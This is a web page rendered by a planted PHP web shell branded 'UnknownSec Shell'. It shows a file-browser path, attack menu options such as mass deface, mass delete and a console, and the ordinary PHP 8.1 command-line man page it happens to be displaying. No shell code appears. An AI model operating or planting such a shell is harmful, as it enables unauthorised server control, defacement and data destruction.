shell bypass 403
UnknownSec Shell
:
/
proc
/
self
/
root
/
proc
/
thread-self
/
root
/
proc
/
thread-self
/
root
/
opt
/
alt
/
php81
/
usr
/
share
/
man
/
man1
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
php.1
.TH php 1 "2021" "The PHP Group" "Scripting Language" .SH NAME php \- PHP Command Line Interface 'CLI' .P php-cgi \- PHP Common Gateway Interface 'CGI' command .SH SYNOPSIS .B php [options] [ .B \-f\fP ] .IR file [[\-\-] .IR args.\|.\|. ] .LP .B php [options] .B \-r .IR code [[\-\-] .IR args.\|.\|. ] .LP .B php [options] [\-B .IR begin_code ] .B \-R .IR code [\-E .IR end_code ] [[\-\-] .IR args.\|.\|. ] .LP .B php [options] [\-B .IR begin_code ] .B \-F .IR file [\-E .IR end_code ] [[\-\-] .IR args.\|.\|. ] .LP .B php [options] \-\- [ .IR args.\|.\|. ] .LP \fBphp \fP[options] \fB\-a\fP .LP .B php [options] \-S .IR addr:port [\-t .IR docroot ] .LP .SH DESCRIPTION \fBPHP\fP is a widely\-used general\-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This is the command line interface that enables you to do the following: .P You can parse and execute files by using parameter \-f followed by the name of the .IR file to be executed. .LP Using parameter \-r you can directly execute PHP .IR code simply as you would do inside a .B \.php file when using the .B eval() function. .LP It is also possible to process the standard input line by line using either the parameter \-R or \-F. In this mode each separate input line causes the .IR code specified by \-R or the .IR file specified by \-F to be executed. You can access the input line by \fB$argn\fP. While processing the input lines .B $argi contains the number of the actual line being processed. Further more the parameters \-B and \-E can be used to execute .IR code (see \-r) before and after all input lines have been processed respectively. Notice that the input is read from .B STDIN and therefore reading from .B STDIN explicitly changes the next input line or skips input lines. .LP PHP also contains an built-in web server for application development purpose. By using the \-S option where .B addr:port point to a local address and port PHP will listen to HTTP requests on that address and port and serve files from the current working directory or the .B docroot passed by the \-t option. .LP If a PHP file is provided to the command line when the built-in web server is used, it will be used as the router script. This script will be started at each HTTP request. The script output is returned to the browser, unless the router script returns the .B false value. If so, the built-in server falls back to the default behaviour, returning the requested resource as-is by looking up the files relative to the document root specified by the \-t option, if provided. .LP If none of \-r \-f \-B \-R \-F \-E or \-S is present but a single parameter is given then this parameter is taken as the filename to parse and execute (same as with \-f). If no parameter is present then the standard input is read and executed. .SH OPTIONS .TP 15 .PD 0 .B \-\-interactive .TP .PD 1 .B \-a Run PHP interactively. This lets you enter snippets of PHP code that directly get executed. When readline support is enabled you can edit the lines and also have history support. .TP .PD 0 .B \-\-bindpath \fIaddress:port\fP|\fIport\fP .TP .PD 1 .B \-b \fIaddress:port\fP|\fIport\fP Bind Path for external FASTCGI Server mode (CGI only). .TP .PD 0 .B \-\-no\-chdir .TP .PD 1 .B \-C Do not chdir to the script's directory (CGI only). .TP .PD 0 .B \-\-no\-header .TP .PD 1 .B \-q Quiet-mode. Suppress HTTP header output (CGI only). .TP .PD 0 .B \-\-timing \fIcount\fP .TP .PD 1 .B \-T \fIcount\fP Measure execution time of script repeated count times (CGI only). .TP .PD 0 .B \-\-php\-ini \fIpath\fP|\fIfile\fP .TP .PD 1 .B \-c \fIpath\fP|\fIfile\fP Look for .B php.ini file in the directory .IR path or use the specified .IR file .TP .PD 0 .B \-\-no\-php\-ini .TP .PD 1 .B \-n No .B php.ini file will be used .TP .PD 0 .B \-\-define \fIfoo\fP[=\fIbar\fP] .TP .PD 1 .B \-d \fIfoo\fP[=\fIbar\fP] Define INI entry .IR foo with value .IR bar .TP .B \-e Generate extended information for debugger/profiler .TP .PD 0 .B \-\-file \fIfile\fP .TP .PD 1 .B \-f \fIfile\fP Parse and execute .IR file .TP .PD 0 .B \-\-help .TP .PD 1 .B \-h This help .TP .PD 0 .B \-\-hide\-args .TP .PD 1 .B \-H Hide script name (\fIfile\fP) and parameters (\fIargs\.\.\.\fP) from external tools. For example you may want to use this when a php script is started as a daemon and the command line contains sensitive data such as passwords. .TP .PD 0 .B \-\-info .TP .PD 1 .B \-i PHP information and configuration .TP .PD 0 .B \-\-syntax\-check .TP .PD 1 .B \-l Syntax check only (lint) .TP .PD 0 .B \-\-modules .TP .PD 1 .B \-m Show compiled in modules .TP .PD 0 .B \-\-run \fIcode\fP .TP .PD 1 .B \-r \fIcode\fP Run PHP .IR code without using script tags .B '<?..?>' .TP .PD 0 .B \-\-process\-begin \fIcode\fP .TP .PD 1 .B \-B \fIbegin_code\fP Run PHP .IR begin_code before processing input lines .TP .PD 0 .B \-\-process\-code \fIcode\fP .TP .PD 1 .B \-R \fIcode\fP Run PHP .IR code for every input line .TP .PD 0 .B \-\-process\-file \fIfile\fP .TP .PD 1 .B \-F \fIfile\fP Parse and execute .IR file for every input line .TP .PD 0 .B \-\-process\-end \fIcode\fP .TP .PD 1 .B \-E \fIend_code\fP Run PHP .IR end_code after processing all input lines .TP .PD 0 .B \-\-syntax\-highlight .TP .PD 1 .B \-s Output HTML syntax highlighted source .TP .PD 0 .B \-\-server \fIaddr:port\fP .TP .PD 1 .B \-S \fIaddr:port\fP Start built-in web server on the given local address and port .TP .PD 0 .B \-\-docroot \fIdocroot\fP .TP .PD 1 .B \-t \fIdocroot\fP Specify the document root to be used by the built-in web server .TP .PD 0 .B \-\-version .TP .PD 1 .B \-v Version number .TP .PD 0 .B \-\-strip .TP .PD 1 .B \-w Output source with stripped comments and whitespace .TP .PD 0 .B \-\-zend\-extension \fIfile\fP .TP .PD 1 .B \-z \fIfile\fP Load Zend extension .IR file .TP .IR args.\|.\|. Arguments passed to script. Use .B '\-\-' .IR args when first argument starts with .B '\-' or script is read from stdin .TP .PD 0 .B \-\-rfunction .IR name .TP .PD 1 .B \-\-rf .IR name Shows information about function .B name .TP .PD 0 .B \-\-rclass .IR name .TP .PD 1 .B \-\-rc .IR name Shows information about class .B name .TP .PD 0 .B \-\-rextension .IR name .TP .PD 1 .B \-\-re .IR name Shows information about extension .B name .TP .PD 0 .B \-\-rzendextension .IR name .TP .PD 1 .B \-\-rz .IR name Shows information about Zend extension .B name .TP .PD 0 .B \-\-rextinfo .IR name .TP .PD 1 .B \-\-ri .IR name Shows configuration for extension .B name .TP .B \-\-ini Show configuration file names .SH FILES .TP 15 .B php\-cli.ini The configuration file for the CLI version of PHP. .TP .B php.ini The standard configuration file will only be used when .B php\-cli.ini cannot be found. .SH EXAMPLES .TP 5 \fIphp \-r 'echo "Hello World\\n";'\fP This command simply writes the text "Hello World" to standard out. .TP \fIphp \-r 'print_r(gd_info());'\fP This shows the configuration of your gd extension. You can use this to easily check which image formats you can use. If you have any dynamic modules you may want to use the same ini file that php uses when executed from your webserver. There are more extensions which have such a function. For dba use: .RS \fIphp \-r 'print_r(dba_handlers(1));'\fP .RE .TP \fIphp \-R 'echo strip_tags($argn)."\\n";'\fP This PHP command strips off the HTML tags line by line and outputs the result. To see how it works you can first look at the following PHP command \'\fIphp \-d html_errors=1 \-i\fP\' which uses PHP to output HTML formatted configuration information. If you then combine those two \'\fIphp \.\.\.|php \.\.\.\fP\' you'll see what happens. .TP \fIphp \-E 'echo "Lines: $argi\\n";'\fP Using this PHP command you can count the lines being input. .TP \fIphp \-R '@$l+=count(file($argn));' \-E 'echo "Lines:$l\\n";'\fP In this example PHP expects each input line being a file. It counts all lines of the files specified by each input line and shows the summarized result. You may combine this with tools like find and change the php scriptlet. .TP \fIphp \-R 'echo "$argn\\n"; fgets(STDIN);'\fP Since you have access to STDIN from within \-B \-R \-F and \-E you can skip certain input lines with your code. But note that in such cases $argi only counts the lines being processed by php itself. Having read this you will guess what the above program does: skipping every second input line. .SH TIPS You can use a shebang line to automatically invoke php from scripts. Only the CLI version of PHP will ignore such a first line as shown below: .P .PD 0 .RS #!/bin/php .P <?php .P // your script .P ?> .RE .PD 1 .P .SH SEE ALSO For a more or less complete description of PHP look here: .PD 0 .P .B http://www.php.net/manual/ .PD 1 .P .SH BUGS You can view the list of known bugs or report any new bug you found at: .PD 0 .P .B http://bugs.php.net .PD 1 .SH AUTHORS The PHP Group: Thies C. Arntzen, Stig Bakken, Andi Gutmans, Rasmus Lerdorf, Sam Ruby, Sascha Schumann, Zeev Suraski, Jim Winstead, Andrei Zmievski. .P Additional work for the CLI sapi was done by Edin Kadribasic, Marcus Boerger and Johannes Schlueter. .P A List of active developers can be found here: .PD 0 .P .B http://www.php.net/credits.php .PD 1 .P And last but not least PHP was developed with the help of a huge amount of contributors all around the world. .SH VERSION INFORMATION This manpage describes \fBphp\fP, version 8.1.31. .SH COPYRIGHT Copyright \(co The PHP Group .LP This source file is subject to version 3.01 of the PHP license, that is bundled with this package in the file LICENSE, and is available through the world-wide-web at the following url: .PD 0 .P .B https://www.php.net/license/3_01.txt .PD 1 .P If you did not receive a copy of the PHP license and are unable to obtain it through the world-wide-web, please send a note to .B license@php.net so we can mail you a copy immediately.
© 2024 UnknownSec